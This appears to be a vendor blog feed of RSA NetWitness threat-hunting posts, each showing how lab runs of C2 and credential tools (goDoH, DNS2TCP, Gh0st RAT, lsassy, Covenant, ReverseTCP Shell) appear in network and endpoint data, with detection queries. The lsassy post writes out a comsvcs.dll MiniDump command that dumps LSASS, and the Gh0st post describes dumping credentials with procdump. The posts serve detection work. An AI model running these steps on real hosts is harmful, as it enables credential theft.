With goDoH, the same binary is used for the C2 server, and the agent that will connect back to it. In the screenshot below, I am setting up the C2 on a Windows endpoint - I specify the domain I will be using, the provider to use for DoH, and that this is the C2:

 

 

On the victim endpoint I do the same, but instead specify that this is the agent:

 

 

After a short period of time, our successful connection is made, and we can begin to execute our reconnaissance commands:

 

 

RSA NetWitness Platform Network Analysis: SSL Traffic

Given its default implementation using SSL, there is not a vast amount of information we can extract, however, that does not mean that we cannot locate DoH in our networks. A great starting point is to look at who currently provides DoH - after some Googling I came across a list of DoH providers on the following GitHub page:

 

 

These providers could be converted into an application rule (or Feed) to tag them in your environment, or utilised in a query to retroactively view DoH usage in your environment. This would help defenders to initially pinpoint DoH usage:

alias.host ends 'dns.adguard.com','dns.google','cloudflare-dns.com','dns.quad9.net','doh.opendns.com','doh.cleanbrowsing.org','doh.xfinity.com','dohdot.coxlab.net','dns.nextdns.io','dns.dnsoverhttps.net','doh.crypto.sx','doh.powerdns.org','doh-fi.blahdns.com','dns.dns-over-https.com','doh.securedns.eu','dns.rubyfish.cn','doh-2.seby.io','doh.captnemo.in','doh.tiar.app','doh.dns.sb','rdns.faelix.net','doh.li','doh.armadillodns.net','jp.tiar.app','doh.42l.fr','dns.hostux.net','dns.aa.net.uk','jcdns.fun','dns.twnic.tw','example.doh.blockerdns.com','dns.digitale-gesellschaft.ch'

NOTE: This is by no means a definitive list of DoH providers. You can use the above as a base, but should collate your own.

 

Running this query through my lab, I can see there is indeed some DoH activity for the Cloudflare provider:

As this traffic is encrypted, it is difficult to ascertain whether or not it is malicious, but there are a couple of factors that may help us. Firstly, we could reduce the meta values to a more manageable amount by filtering on long connection, which is under the Session Analysis meta key, this is because C2 communications over DoH would typically be long lived:

 

 

We could then run the JA3 hash values through a lookup tool to identify any outliers (in this instance I am left with one due to my lab not capturing a lot of data):

 


For details on how to enable JA3 hashes in the RSA NetWitness Platform, take a look at one of our previous posts: Using the RSA NetWitness Platform to Detect Command and Control: PoshC2 v5.0 

Running the JA3 hash (706ea0b1920182287146b195ad4279a6) through OSINT (https://ja3er.com/form), we get results back for this being Go-http-client/1.1, this is because the goDoH application is written in Golang - this stands out as an outlier and the source of this traffic would be a machine to perform further analysis on:

 

 

 

RSA NetWitness Platform Network Analysis: SSL Intercepted Traffic

Detecting DoH when SSL interception is in place becomes far easier. DoH requests for Cloudflare, for example

, supply a Content-Type header that allows us to easily identify it (besides the alias.host value):

 

Also determining whether the DoH connections are malicious becomes far easier when SSL interception is in place, this is because it allows defenders to analyse the payload that would typically be encrypted. The following screenshot shows the decrypted DoH session between the client and Cloudflare - here we are able to see the DNS request and response in the clear, which divulges the C2 domain being used, go.doh.dns-cloud.net. We can also see that the JA3 hash we previously reported was correct, as the User-Agent is Go-http-client/1.1:

 

 

The session for this DoH C2 traffic is quite large, so I am unable to show it all - this is due to the limited amount of information that can be transmitted via each DNS query. An example of data being transmitted via an A record can be seen below - the data is encrypted so won't make sense by merely viewing it:

 

 

Within this session there are hundreds of requests for the go.doh.dns-cloud.net domain with a very high variability in the FQDN seen in the name parameter of the query; this is indicative behaviour of C2 communication over DNS. Below I have merged five of the requests together in order to help demonstrate this variability:

 

 

Given the use of TCP for HTTPS vs the common use of UDP for DNS, the traffic shows as a single session in the RSA NetWitness Platform due to TCP session/port reuse, normally this type of activity would present itself over a larger number of RSA NetWitness Platform sessions when using native DNS.

 

RSA NetWitness Endpoint Analysis

Looking at my compromise keys, I decide to start my triage by pivoting into the Events view for the meta value, runs powershell with http argument as shown below.

 

 

From the following screenshot, we can see an executable named, googupdater.exe, running out of the users AppData directory is executing a PowerShell command to get the public IP of the endpoint. We also get to see the parameter that was passed to the googupdater.exe binary that reveals the domain being contacted:

 

NOTE: googupdater.exe is the goDoH binary and was renamed for dramatic effect.

We could have also pivoted on the outbound from unsigned appdata directory meta value which would have led us to this suspect binary, as well. While from an Endpoint perspective this is just another compiled tool communicating over HTTPS, the fact that it will need to spawn external processes to execute activity would lead us to an odd parent process:

 

 

Given this scenario in terms of Endpoint, this would lead us back to common hunting techniques, but in the interest of brevity, I won't dig deeper for this tool. The key items would be an uncommon parent process for some unusual activity, and the outbound connections from an unsigned tool. While both can at times be noisy, in conjunction with other drills, they can be narrowed down to cases of interest.

 

Conclusion

This post further substantiates the requirement for SSL interception as it vastly improves the defenders capability to investigate and triage potentially malicious communications. While it is still possible to identify suspect DoH traffic without SSL interception, it can be incredibly difficult to ascertain its intentions. DNS is also a treasure trove for defenders, and the introduction and use of DoH could vastly deplete the ability for them to protect the network effectively.

When performing network forensics, all protocols should be analysed, however, some tend to be more commonly abused than others; one of these being DNS. While not as flexible as say HTTP, it does flow through, and outside of networks a lot easier due to its configuration. This means that DNS can be utilised to encapsulate data that would be routed outside the network to an attacker-controlled name server allowing data exfiltration or the download of tools. In this post, I will cover how we can use NetWitness Network to analyse the DNS protocol effectively, to do so we will use a tool called DNS2TCP (https://github.com/alex-sector/dns2tcp) in our lab to generate some sample traffic.

 

DNS record types

The DNS standard defines more than 80 record types, but many of these are seldom used. The most common are:

  • A Record - used to map a host and domain name to the IP address (forward lookup)
  • PTR Record - used to map an IP address to host and domain name (reverse lookup)
  • MX Record - to return host and domain mapping for mail servers
  • CNAME Record - used to return an alias to other A or CNAME records
  • TXT Record - used to provide the ability to associate arbitrary text with a host or other name

 

In this post, we will focus on TXT records being used to encapsulate data. TXT records are typically utilised as the size of this field allows for larger amounts of data to be transferred in a single request compared to A, or AAAA records. This field is also legitimately used to provide SPF records, specify the domain owner, return the full name of the organization, as well as other similar uses.

 

How Does NetWitness Network Analyse DNS?

The DNS_verbose_lua parser is available from RSA Live, it extracts metadata of interest from the DNS protocol that can help a defender in the identification of anomalous DNS traffic. We suggest that you subscribe to this parser (and others), as they are updated regularly.

 

 

Which metadata can help with the analysis?

The following meta keys are particularly useful for identifying, and subsequently analysing the DNS protocol:

Meta KeyDescriptionIndexed by default
serviceThe protocol as identified by NetWitnessYes
alias.hostThe hostnames being resolvedYes
alias.ipThe IP address that the hostname resolves toYes
service.analysisMeta values surrounding the characteristics of the protocolYes
tldThe top-level domain extracted from the hostnameYes
sldContains the part of hostname directly below the top-level domain (second level domain)No
dns.resptextThe response for the DNS TXT recordNo
dns.querytypeThe human readable value for the DNS Query type performed in the requestNo
dns.responsetypeThe human readable value for the DNS Query type returned by the responseNo

 

You will notice from the table above that some of the meta keys are not indexed by default. The following entries would therefore need to be added to the Concentrators index file so that they can be used in investigations:

<key description="SLD" format="Text" level="IndexValues" name="sld" defaultAction="Closed" valueMax="500000" />
<key description="DNS Query Type" format="Text" level="IndexValues" name="dns.querytype" valueMax="100" />
<key description="DNS Response Type" format="Text" level="IndexValues" name="dns.responsetype" valueMax="100" />
<key description="DNS Response TXT" format="Text" level="IndexValues" name="dns.resptext" valueMax="500000" />

NOTE: Details regarding the Concentrator index, such as how it works, ensuring optimal performance, and how to add entries can be found here: https://community.rsa.com/docs/DOC-100556

 

DNS2TCP

DNS2TCP is a tool that encapsulates TCP sessions within the DNS protocol. On the server side, we configure the tool to listen on UDP port 53, as per the DNS standard, we also specify our domain, "dns2tcp.slbwyfqzxn.cloud", and the resources. Resources are a local or remote service listening for TCP connections - in the example below, I specify a resource named SSH for connections to port 22 on 127.0.0.1:

The client will act as a relay for a specific resource, SSH in our example, and will listen on the specified port (2222) and forward traffic from the local machine to the remote server via DNS TXT records:

Once the communication between the client and server has been established, we can then connect to the server using SSH that will be encapsulated in DNS:

 

NetWitness Network Analysis

Homing in on DNS traffic is incredibly easy with NetWitness, we merely need to look for DNS under the Service meta key, or execute the query "service = 53". To place a focal point on possibly encoded DNS TXT records, we can pivot on the meta values, "dns base36 txt record", and "dns base64 txt record", located under the "Session Analysis" meta key. These tools will encode the data in the TXT record due to the limitations placed on the record type, such as only allowing printable ASCII symbols and a maximum length of 255 characters. 

From the screenshot below, we can see a suspicious sounding SLD with a large number of NetWitness sessions that would be worth investigating.

From here, I like to open the "SLD", "Hostname Alias", and "DNS Response Text" meta keys. What you can see from the screenshot below is a large number of unique "alias.host" or "dns.resptext" values to a single SLD; which is indicative of possible DNS tunnelling. The requests are highly unique, so they are not to be resolved by the local DNS cache, or the cache on the internal DNS servers.

The screenshot below shows the elevated number of different TXT records are related with the single SLD "slbwyfqzxn".

NOTE: Some commercial software packages such as antivirus and antispam tools show a similar behaviour and exchange data over DNS TXT record for their own security checks.

 

Reconstructing the sessions, we can see the TXT records and use the in-built Base64 decoding capability to see what data was encapsulated. In the screenshot below, we can see the initialisation of an SSH session:

 

Conclusion

DNS is commonly overlooked and an area that defenders should pay more attention toward, it is a great way to exfiltrate data out of an otherwise “secured” network. DNS2TCP is just one of the tools that allows data to be encapsulated within DNS, there are many others, but they all have similar behaviour and can be identified using similar techniques as shown in this post.

In order to defend their network effectively, analysts need to understand the threat landscape, and more specifically how individual threats present themselves in their tools. With that in mind, I started researching common Remote Access Trojans/Tools (RAT) that are publicly available for anyone to use. This will walk you through Gh0st RAT (https://attack.mitre.org/software/S0032/), its footprint, and how the RSA tools help you detect its presence from both the endpoint and packet perspective. 

 

Just like any malware, a Gh0st infection will consist of some sort of delivery mechanism. Most mature SOCs with mature tools should get an alert on either its delivery (using common methods such as phishing, drive-by download, etc) or subsequent presence on an endpoint. However, let’s assume that it does not get detected, and as an analyst you are proactively hunting in your environment.  How would you go about detecting the presence of such a Trojan?

 

Gh0st Overview and Infection

Gh0st is a very well-documented RAT but you’ll find a quick overview of some of the functionality and way it was configured for testing purposes belowAlso, I will show you how our tools can help identify Gh0st.  The Gh0st server component is a standalone portable executable (PE) file, which gives you a simple interface when executed.  Once executed, the server component is used not only to control infected systems, but also used to configure the client component that is delivered to victims.

 

                    

Figure 1: Gh0st Interface

 

The build tab that is used to configure the client executable had some default HTTP settings, which I changed to use “gh0st[.]com” for simplicity.  I also created an entry in DNS for this domain to point to our command and control (C2) server.

 

                    

Figure 2: Gh0st HTTP and Service Options

 

You can also see that the Build tab contains options for the service display name and description.  After I created the malicious client component sample, I crafted an email using Outlook Web Access on Exchange and sent it to the victim.

 

                      

Figure 3: Phishing Email

 

The victim setup had Windows 10 installed using all default settings.  Once the user received the email, I was surprised to learn that this wasn’t flagged by local Antivirus or any other tools.    Even after I executed the PE file, it was not flagged as malicious.  It installed the service as seen here but there was no initial identification and no “alarms” were raised. 

                                             

Figure 4: Service Installed

 

 The malware executed fine, and I could see the connection through the Gh0st Dashboard on the server component.

 

                   

Figure 5: Successful Client Connection

 

From here, I used some of the built-in features of Gh0st to control and interact with the endpoint.  Here are some of those features:

 

                                                

Figure 6: Options Once Connected

 

I first opened a “Remote Shell” which basically just gives you a command prompt with System level permissions.

 

               

Figure 7: Remote Shell

 

From there, I executed net user commands through the remote shell.  The net user commands are for reconnaissance and used to identify what users are on the machine.  They can be used in conjunction with a username to identify what groups the user belongs to.

 

                     

Figure 8: Running Commands Using Remote Shell

 

Next, I modified the registry to allow for cleartext credential storage in memory. I then copied procdump over to the machine using the “File Manager” feature, and then I used procdump to dump the lsass.exe memory into a .dmp file.  I finally copied that .dmp file back over to my C2 server.  This a common technique for getting credentials out of memory in cleartext.  The attacker can use these credentials to access other parts of the network.

 

                        

Figure 9: File Manager

 

Figure 10: Procdump on LSASS

 

RSA NetWitness Endpoint 4.4 Detection

Prior to performing any of the aforementioned steps, I installed RSA NetWitness Endpoint on the victim and created a baseline of the IIOCs.  This was also prior to performing any additional interaction with the hosts.  These IIOCs were coming from multiple machines since I had Windows 10 and Windows 7 victims with agents installed.  There was only one level 1 IIOC and not much else going on.

Once the email was opened and the file was clicked, there were some additional IIOCs that fired including:

  • Unsigned writes executable
  • Unsigned writes executable to appdata local directory
  • Unsigned writes executable to Windows directory
  • Renames files to executable

 

Figure 11: IIOCs Fired in RSA NetWitness Endpoint

 

 

These are all great indicators for hunting and that should be checked daily, the results triaged, and appropriate measures taken for each hit.

Then I pivoted from those IIOCs and looked for the “invoice.exe” module in the tracking data.  This showed me the “FastUserSwitchingCapability” service being created.

 

Figure 12: Service Created

 

Also, this is where the net user commands were found. 

 

Figure 13: Net User Commands Found in RSA NetWitness Endpoint

 

Once the registry change for cleartext credential storage was executed, the IIOC for that fired as seen here.

 

Figure 15: More IIOCs

 

So, going back to the service we can see that it created an Autorun entry and gave it a high IIOC score.

 

Figure 16: Autoruns in RSA NetWitness Endpoint

 

It’s was also listed in the modules.

 

Figure 17: Modules Listed

 

RSA NetWitness Endpoint 11.3 Detection

Here’s how things look in RSA NetWitness Endpoint 11.3.  First here is the baseline IOC, BOC, EOC, and File Analysis meta fields after the agent has been installed.

 

Figure 18: RSA NetWitness Endpoint 11.3 Baseline

 

This is the risk score for the host which is based on the windows firewall being disabled.

 

Figure 19: Initial RSA NetWitness Endpoint 11.3 Risk Score

 

After I executed the dropper there was some additional meta generated including:

  • Unsighted writes executable to appdatalocal directory
  • Runs service control tools
  • Starts local service
  • Auto unsigned hidden
  • Auto unsigned servicedll

 

Figure 20: Additional Meta after Dropper Execution

Figure 21: Invoice.exe Creating Files in AppData Folder

 

We can also see this alert for “Autorun Unsigned Servicedlls” which is related to the “autorun unsigned servicedll” meta in the Navigate view.

 

Figure 22: Risk Score Increase

Figure 23: Autoruns with Four DLLs

Figure 24: Autorun Unsigned Servicedll Meta

 

Next, I opened up a remote shell using the Gh0st dashboard and executed some basic reconnaissance commands (whoami, net user /domain, etc) just like in RSA NetWitness Endpoint 4.4.

 

Figure 25: Reconnaissance Commands

 

Again, I executed the registry command to enabled cleartext credential storage and procdump on the lsass.exe process.  That triggered a critical alert in RSA NetWitness Endpoint 11.3 which gave a risk score of 100 just like in RSA NetWitness Endpoint 4.4.

 

Figure 26: Registry Command to Enable Cleartext Credential Storage

 

Also, going back to look at the navigate view, there was some additional meta generated for these commands.

  • Enumerates domain users
  • Modifies registry using command-line registry tool
  • Runs registry tool
  • Enables cleartext credential storage
  • Gets current user as system
  • Gets current user

 

Figure 27: Additional Meta

 

RSA NetWitness Network Detection

While there are obviously various detection capabilities for identification of delivery of the gh0st executable, the purpose of this post is to discuss presence of the gh0st RAT once a system is infected.  As such, the RSA NetWitness Packets (NWP) Gh0st parser detected the presence of the Gh0st trojan, based on the communications between the gh0st server and client. Just by looking in the “Indicators of Compromise” the Gh0st traffic is listed there.  With just one click I was able to find the C2 activity using RSA NetWitness Platform packet data.

 

Figure 18: IOC Meta in the RSA NetWitness Platform

 

As mentioned earlier, one of the benefits of doing this is that when we identify gaps, we work with people like Bill Motley in our content team to create appropriate content.  Initially the parser wasn’t detecting this specific gh0st activity but that has been fixed. An updated parser is now available in RSA NetWitness Live.

 

Here we can see some of the Gh0st C2 traffic that generates the IOC meta mentioned before.

 

Figure 19: Gh0st C2 Seen in the RSA NetWitness Platform

 

Also here is the HTTP traffic which is  heart beat callout to check and make sure it’s still connected.  It does this HTTP get request about every two minutes and only the string “Gh0st” is returned.

 

Figure 20: Heartbeat Traffic

 

Even without this parser, Gh0st C2 traffic can be found with as little as three pieces of metadata.  First, looking at service metadata labeled as ‘OTHER’ which can be a good place to start hunting because it’s network traffic that doesn’t have a known parser and/or doesn’t follow the RFCs for known protocols.  Then, in the IOC meta there was ‘binary indicator’ which can help limit the dataset.  Finally, in the analysis.service metadata the ‘unknown service over http port’ value stuck out.  Performing these three pivots from the full dataset found all of the gh0st traffic, including some additional traffic not seen previously.  That can be seen in the screenshot below under the Indicators of Compromise column.  There are IOCs showing gh0st but there are also some that only show the traffic as binary.

 

Figure 21: Additional Traffic Not Seen Previously

 

Summary

Gh0st is one of the simplest and easiest RATs to use.  The RSA NetWitness Platform had no trouble finding this activity.  Though this is a publicly available and commonly used RAT, it frequently goes unidentified by AV and other technologies, as referenced in my example.  This is where the power of regular threat hunting comes in, since it helps you detect unknown threats that your regular tools don’t necessarily pick up on. Some of these can be automated, as we did with the parser changes.

 

This means that, in the future, you no longer need to look for this specific threat but rather follow this process, which will hopefully lead you to newer unknown threats. Using the right tools coupled with the right methodology will help you better protect your network/organization, unfortunately not all of this can be fully automated and some of the automation will still require appropriate human triage.

A couple of days ago on Github, Hackndo released a tool (https://github.com/Hackndo/lsassy) that is capable of dumping the memory of LSASS using LOLBins (Living of the Land Binaries) - typically we would see attackers utilising SysInternals ProcDump utility to do this. Lsassy uses the MiniDump function from the comsvcs.dll in order to dump the memory of the LSASS process; this action can only be performed as SYSTEM, so it therefore creates a scheduled task as SYSTEM, runs it and deletes it.

 

We decided to take this tool for a spin in our lab and see how we would detect this with NetWitness.

 

The Attack

To further entrench themselves and find assets of interest, an attacker will need to move laterally to other endpoints in the network. Reaching this goal often involves pivoting through multiple systems, as well as dumping LSASS to extract credentials. In the screenshot below, we use the lsassy tool to dump credentials from a remote host that we currently have access to:

 

The output of this command shows us the credentials for an account we are already aware of, but also shows us credentials for an account we previously did not, tomcat-svc.

 

NetWitness Network Analysis

I like to start my investigation every morning by taking a look at the Indicators of Compromise meta key, this way I can identify any new meta values of interest. Highlighted below is one that I rarely see (of course in some environments this can be a common activity, but anomalies of what endpoints this takes place on can be identified):

 

Reconstructing the session, we can see the remote scheduled task that was created and analyse what it is doing. From the below screenshot, we can see the task created will use CMD to launch a command to locate LSASS, and subsequently dump it to \Windows\Temp\tmp.dmp using the MiniDump function within the comsvcs.dll:

 

cmd.exe /C for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ^%B \Windows\Temp\tmp.dmp full

This task also leaves other artifacts of interest behind. From the screenshot below, we can see the tmp.dmp LSASS dump being created and read:

 

This makes the default usage of lsassy easy to detect with simple application rule logic such as the below. Of course the names and location of the dump can be altered, but attackers typically tend to leave the defaults for these types of tools:

service = 139 && directory = 'windows\\temp\\' && filename = 'tmp.dmp'

 

NetWitness Endpoint Analysis

Similarly with Endpoint, I like to start my investigations by opening up the Compromise meta keys - IOC, BOC, and EOC. From here I can view any meta values that stand out, or iteratively triage through them. One of the meta values of interest from the below is, enumerates processes on local system:

Pivoting into the Events view for this meta value, we can see cmd.exe launching tasklist to look for lsass.exe - to get proper access, the command is also executing with SYSTEM level privileges - this is something you should monitor regularly:

 

After seeing this command, it would be a good idea to look at all activity targeted toward LSASS for this endpoint. To do that, I can use the query filename.dst = 'lsass.exe' and start to investigate by opening up meta keys like the ones below. Something that stands out as interesting is the usage of rundll32.exe to load a function called minidump from the comsvcs.dll:

Pivoting into the Events view, we can see the full command a lot easier. Here we can see that rundll32.exe is loading the MiniDump function from comsvcs.dll and passing some parameters, such as the process ID for dumping (which was found by the initial process enumeration), location and name for the dump, and the keyword full:

 

This activity could be picked up by using the following logic in an application rule. This will be released via RSA Live soon, but you can go ahead and implement/check your environment now:

device.type = 'nwendpoint' && category = 'process event' && (filename.all = 'rundll32.exe') && ((param.src contains 'comsvcs.dll' && param.src contains 'minidump') || (param.dst contains 'comsvcs.dll' && param.dst contains 'minidump')

 

Conclusion

It is important to consistently monitor network and endpoint behaviour for abnormal actions taking place, and not solely rely on out of the box detections. New attack methods/tools are consistently being devleoped, but the actions these tools take always leave footprints behind, it is down to the defender(s) to spot the anomalies and triage accordingly. With that being said, RSA are consistently updating detections for attacks such as the one laid out in this post - we have been working with the content team to have this tool usage detected with out of the box content.

Introduction

Having recently moved into the IR team – where I now have to actually do stuff as opposed to just talking about stuff in technical sales – I have found that the best way to get up to speed with detecting attacker behaviours is to run the tools they are likely to use in my lab so I can get familiar with how they work. Reading blogs like this and the others in Lee Kirkpatrick's excellent Profiling Attackers Series is great, but I find I learn much faster by doing things and interacting with systems myself.


Covenant

Covenant is an open source C2 framework (https://github.com/cobbr/Covenant) that can be viewed as a replacement for PowerShell Empire, since its retirement.

In this blog series, Lee Kirkpatrick has already covered some examples of how to get the payload delivered and installed on the target, so we’re going to dive straight in to how our Hunting Methodology can be used to detect the activity. We are going to hunt for activity using data generated by both NetWitness Network and NetWitness Endpoint.

For the purpose of this exercise, we have used the default http settings for the Listener profile in Covenant, and only changed the default beacon setting from 5 seconds to 120 seconds to represent a more realistic use of the tool. The settings can be easily changed (such as the user-agent, directory and files used for the callback etc) but quite often the defaults are used by attackers too! We have also used the Power Shell method for creating our Launcher.


NetWitness Network Analysis

Covenant uses an HTTP connection for its communication (which can optionally be configured to run over SSL with user provided certs). By using our regular methodology of starting with Outbound HTTP traffic (direction = ‘outbound’ && service = 80), we can review the Analysis meta keys for any interesting indicators:

 

 

Reviewing the Service Analysis keys (analysis.service) we can see some interesting values:

 

 

Check the RSA NetWitness Hunting Guide for more information on these values in Service Analysis

 

By drilling into these 6 values we reduce our dataset from over 4,000 sessions to 69 sessions – this means that these 69 sessions all share the same “interesting” characteristics that suggest that they are not normal user initiated web browsing.

 

 

With 69 sessions we can use Event Analysis to view those sessions in more detail, which reveals the bulk of traffic belongs to the same Source & Destination IP address pair:

 

 

This appears to be our Covenant C2 communications. Opening the session reconstruction, we can see more details. Some things that we can observe that could be used to enhance detection of this traffic would be the strange looking User-Agent string:

 

 

The User-Agent string is strange as appears to be old. It resolves to Chrome version 41 on Windows 7 – the victim in this case is a Windows 10 system, and the version of Chrome installed on the host is version 79. If you attempt to connect to the Listener with a different User-Agent it returns a 500 Error:

 

 

Don't poke the Bear (or Panda, Kitten, Tiger etc) - if you find these indicators in your environment, don't try to establish a connection back to the attacker's system as you will give them a tip-off that you are investigating them.

Also, the HTTP Request Header “cookies” appears in all sessions:

 

 

The HTTP Request Header “cookie” also appears in all sessions after the initial callback … so sessions with both “cookies” and “cookie” request headers appear unique to this traffic:

 

 

The following query (which could be used as an App rule) identifies the Covenant traffic in our dataset:

client = 'mozilla/5.0 (windows nt 6.1) applewebkit/537.36 (khtml, like gecko) chrome/41.0.2228.0 safari/537.36' && http.request = 'cookies' && http.request = 'cookie'

Another indicator we could use is the Request Header value SESSIONID=1552332971750, as this also appears to be a static string in the default HTTP profile for Covenant - as shown in this sample that has been submitted to hybrid-analysis.com https://www.hybrid-analysis.com/sample/aed68c3667e803b1c7af7e8e10cb2ebb9098f6d150cfa584e2c8736aaf863eec?environmentId=10… 

 

 

NetWitness Endpoint Analysis

When hunting with NetWitness Endpoint, I always start with my *Compromise keys – Behaviours of Compromise, Indicators of Compromise, and Enablers of Compromise, as well as reviewing the Category of endpoint events.

 

 

Here we can see 4 meta values related to running PowerShell – which we know is the method used for creating our Covenant Launcher.

Upon viewing these events in Event Analysis we can see the encoded PowerShell script being launched

 

 

Analysis shows that we have a very large encoded parameter being passed. It’s too large for us to decode and manage in the NetWitness GUI, so we can paste the command into CyberChef and decode it from there.

 

 

We can further decode the string to reveal the command:

 

 

The output here appears to be compressed, so we can add an Inflate operation to our recipe to reveal the contents:

 

 

Looks like we have some executable code. A quick search for recognisable strings yields a URL which matches our network traffic for the callback to the Covenant server, as well as a template for the html page that should match what is served by the Covenant Listener

 

 

Also the block of text can be Base64 decoded to reveal the Request Headers to be sent by the Grunt when communicating with the Listener:

 

 

This also matches what we observed in our network analysis for a Grunt check-in:

 

 

And the command being sent to the Grunt via the response from the Listener:

 

Decoding the &data= section of the above Post shows the encrypted data being returned to the Listener - known as the GruntEncryptedMessage:

 

 

 

Happy Hunting!

CT

Josh Randall

Easy-add Recurring Feeds

Posted by Josh Randall Employee Dec 19, 2019

19DEC2019 Update (with props to Leonard Chvilicek for pointing out several issues with the original script)

  • implemented more accurate java version & path detection for JDK variable
  • implemented 30 second timeout on s_client command
  • implemented additional check on address of hosting server
  • implemented more accurate keystore import error check
  • script will show additional URLs for certs with Subject Alternate Names

 

In the past, I've seen a number of people ask how to enable a recurring feed from a hosting server that is using SSL/TLS, particularly when attempting to add a recurring feed hosted on the NetWitness Node0 server itself.  The issue presents itself as a "Failed to access file" error message, which can be especially frustrating when you know your CSV file is there on the server, and you've double- and triple-checked that you have the correct URL:

 

There are a number of blogs and KBs that cover this topic in varying degrees of detail:

 

 

Since all the steps required to enable a recurring feed from a SSL/TLS-protected server are done via CLI (apart from the Feed Wizard in the UI), I figured it would be a good idea to put together a script that would just do everything - minus a couple requests for user input and (y/N) prompts - automatically.

 

The goal here is that this will quickly and easily allow people to add new recurring feeds from any server that is hosting a CSV:

 

Success!

In this blog post, I am going to cover a C&C framework called ReverseTCP Shell,. This was recently posted to GitHub by ZHacker:

 

With this framework, a single PowerShell script is used and PowerShell is the server component of the C2. This is also a little different from other C2's as it doesn't use a common protocol such as HTTP, this is why we thought it would be a good idea to cover, as it allows us to demonstrate the power of NetWitness with proprietary or unknown protocols.

 

The Attack

Upon execution of the ReverseTCP Shell PowerShell script, it will prompt for a couple of parameters, such as the host and port to listen for connections:

 

It will then supply options to generate a payload, I chose the Base64 option and opted to deploy the CMD Payload on my endpoint. At this point, the C2 also starts to listen for new connections:

 

After executing the payload on my endpoint, I recieve a successful connection back:

 

Now I have my successful connection, I can begin to execute reconaissance commands on the endpoint, or any commands of my choosing:

 

The C2 also allows me to take srceenshots of the infected endpoint, so let's do that as well:

 

NetWitness Packets Analysis

NetWitness Packets does a fantastic job at detecting protocols and has a large range of parsers to do so. In some cases, NetWitness Packets can not classify the traffic it is analysing, this could be because it is a proprietary protocol, or is just a protocol there is not a parser for, yet; in these instances, the data gets classified as OTHER

 

This traffic will still be analysed by the parsers in NetWitness, and should therefore be analysed by you as well. So to start the investigation, we would focus on traffic of type OTHER, using the following query, service=0 - from here, we can open other meta keys to see what information NetWitness parsed out. One that instantly stands out as a great place to start investigating is the windows cli admin commands metadata under the Service Analysis meta key:

 

Reconstructing the sessions, it is possible to see raw data being transferred back and forth, there is no structure to the data and therefore why NetWitness classified it as OTHER, but because NetWitness saw CLI commands being executed, it still created a piece of metadata to tell us about it:

NOTE: You may notice that the request and response in the above screenshot are reversed, this can happen for a number of reasons and an explanation as to why this occurs can be found in this KB article: 000012891 - When investigating sessions in RSA NetWitness, the source and destination IP addresses appear reversed.

 

The following query could be used to find suspect traffic such as this:

service = 0 && analysis.service = 'windows cli admin commands'

 

Further perusing the traffic for this C2, we can also see the screenshot taking place:

 

Which returns a decimal encoded PNG image:

 

We can take these decimal values from the network traffiic and run them through a recipe in CyberChef (https://gchq.github.io/CyberChef) to render the image, and see what the attacker saw:

 

NetWitness Endpoint Analysis

In NetWitness Endpoint, I always like to start my investigation by opening the IOC, BOC, and EOC meta keys. All of the metadata below should be fully investigated, but for this blog post, I will start with runs powershell decoding base64 string:

Pivoting into the Events view, and analysing all of the sessions, I come across the command I used to infect the endpoint, this event should stand out as odd due to the random capitalisation of the characters, which is an atempt to evade case sensitive detection machanisms, as well as the randomised Base64 encoded string, which is to hide the logic of the command:

 

Due to the obfuscation put in place by the creator, we cannot directly decode the Base64 in the UI, this is because the Base64 encoded string has been shuffled. For instances like this were large amounts of obfuscation are put in place, I like to let PowerShell decode it for me by replacing IEX (Invoke-Expression) with Write-Host - so rather than executing the decoded command, it outputs it to the terminal:

Always perform any malware analysis in a safe, locked down environment. The method of deobfuscation used above does not neccessarily mean you will not be infected when performing the same on other scripts.

After decoding the initial command, it appears there is more obfuscation put in place, so I do the same as before, replacing IEX with Write-Host to get the decoded command. This final deobfuscation is a PowerShell command to open a socket to a specified address and port - I now have my C2, and can use this information to pivot to the data in NetWitness Packets (if I had not found it before):

 

The above PowerShell was a subset of the first decoded command, the final piece of the PowerShell is a while loop that waits for data from the socket it opens, this is why the IEX alteration would not work here, it is just obfuscation by using multiple poorly named variables to make it hard to understand:

 

Flipping back over to the Investigation UI, and looking at other metadata under the BOC meta key, it is possible to see a range of values being created for the reconaissance commands that were executed over the C2:

 

As of 11.3, there is a new Analyze Process view (Endpoint: Investigating a Process), it allows us to visually understand the entire process event chain. Drilling into one of the events, and then using the Analyze Process function, it is possible to see all of the additional processes spawned by the malicious PowerShell process:

 

Conclusion

Analysing all traffic and protocols is important, it is true that some protocols will be (ab)used more than others, but excluding the analysis of traffic classified as OTHER, can leave malicious communications such as the one detailed in this blog post to go under the radar. Looking for items such as files transferred, cli commands, long connections, etc. can all help with dwindling down the data set in the OTHER bucket to potentially more interesting traffic.

Filter Blog

By date: By tag: